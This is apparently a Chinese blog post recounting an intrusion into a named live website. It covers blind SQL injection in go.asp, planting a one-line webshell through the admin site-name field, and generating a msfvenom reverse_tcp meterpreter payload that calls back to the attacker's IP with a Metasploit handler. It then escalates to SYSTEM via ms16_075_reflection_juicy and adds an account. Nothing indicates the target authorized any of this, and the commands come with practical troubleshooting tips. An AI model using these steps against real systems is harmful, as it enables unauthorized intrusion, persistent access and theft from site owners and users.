记一次H站渗透以及提权

本次实战渗透且提权H站 其实就是很简单的一个Msf提权 但是中间涉及一些本人认为的一些容易不注意的小问题 所以想以实战的文章来阐述这个容易被忽略的小问题.

 

网站URL：xxdh.me

网站存在漏洞的地址：/app/go.asp

 

1.过程

漏洞1：SQL盲注

这个网站所使用的程序是一套自助交换友情链接的ASP脚本程序直链王.

而这套程序中的 /app 这个路径下的 go.asp这个文件主要是用来根据id号进行数据库中的判断从而实现跳转URL.

代码段截图：

 

这行代码中将id参数直接带入到数据库进行查询 并且没有SQL注入防护所以发生SQL注入但是在进行SqlMap进行注入测试的时候 发现无法注入所以有点懵最后通过询问ASP审计大佬发现这个地方有点特别虽然这个地方将id参数直接带入数据库进行查询 没有拦截 但是只能盲注 并且 我们可以看到查询的表是 wzadd这个表 这个表中是自助换链之后存放友情链接的地方

 

所以盲注的条件就是必须先知道你要带入的id数是多少 一般笨方法是随便猜数 但是也可以通过Python写脚本进行数字遍历.

http://127.0.0.1/app/go.asp?id=1如果这个id在wzadd表中不存在 就会一直提示网页正在加载 反之 如果id数在表中存在 就会直接跳转到id数对应的URL中.这里需要通过这个条件来进行盲注是否成功.但是由于手工盲注十分繁琐.这里我写了一个PHP自动化脚本这个脚本由于在我家里面的电脑中周六日可以放出来给大家.

漏洞2：数据库任意下载（较为鸡肋）

这套程序中默认的数据库为：data/ddf.mdb 但是会有这几种情况

第一种就是大家较为常见的直接修改掉了数据库名称

第二种是我不理解的就是ddf.mdb 明明是存在的访问这个路径之后提示404 在Windows2008（R2） Windows2012中非常常见.

漏洞三：后台GetShell

 

这个地方有一个数据库备份但是不要太开心因为这套程序我并没有见到前台以及后台有上传点……

所以这个GetShell的地方在基本信息设置里面….

 

网站名称插入一句话但是请记住一定要进行闭合！我之前本地测试的时候忘记闭合这回事插死了好多次都不知道怎么回事.

一句话连接地址：/inc/const.asp

2.提权

拿到Shell之后先简单搜集一下信息吧.

 

 

 

简单搜集一下通过网站目录知道了使用的宝塔面板

 

查看一下进程看看有没有杀软

 

简单搜集一下之后直接开始拿出MsfConSole

第一步先获取漏洞机的会话

首先先生成反弹木马由于这台服务器上并没有安装杀软所以不用免杀

msfvenom -p windows/meterpreter/reverse_tcp LHOST=外网IP LPORT=端口 -f exe -o shell.exe

生成反弹木马之后设置服务器监听设置：

Useexploit/multi/handler

Setpayloadwindows/x64/meterpreter/reverse_tcp

Set LHOST 外网IP

Set LPORT 反弹端口

Exploit

 

获取到会话之后如果你前面信息搜集已经搜到了非常多的信息那么你可以跳过信息搜集阶段直接开始进行提权这里我们使用到一个提权辅助模块

Windows-Exploit-suggester

这个辅助模块可以通过系统位数系统架构 会话类型帮助我们选择默认存在的漏洞EXP来帮助我们进行提权.

使用帮助：

use post/multi/recon/local_exploit_suggester

setsession1（根据自己的会话进行更改）

exploit

使用这个之前首先使用background 回到Msf操作的界面并将session保持在后台

 

记住这个4 因为在设置session会话的时候需要用到

 

检测到了这些EXP

我们使用最后一个来帮助我们提权吧

exploit/windows/local/ms16_075_reflection_juicy

提权成功之后

 

直接SYSTEM权限

之后的过程就是添加账号进服务器.

 

小结：这篇文章存在的意义其实就是一些小的容易被忽略的问题

第一：msfvenom -p windows/meterpreter/reverse_tcp LHOST=外网IP LPORT=端口 -f exe -o shell.exe使用这句话生成反弹木马的时候一定要注意MsfConSole反弹出来的会话默认的监听端口是4444问题就在于使用默认的4444端口 会无法接收到反弹来的会话 所以希望大家在生成的时候可以改下不常用的端口 以免发生各种各样的问题 因为我提权的时候就在这里面费了好多时间,

第二：Setpayloadwindows/x64/meterpreter/reverse_tcp 使用这句payload的时候 一定要注意前面的x64 这个地方是需要根据你漏洞机的实际系统位数进行修改不然会发生无法调用模块调用模块无法使用EXP利用成功但是接收不到session会话等问题 同样的 我也在这上面费了不少时间.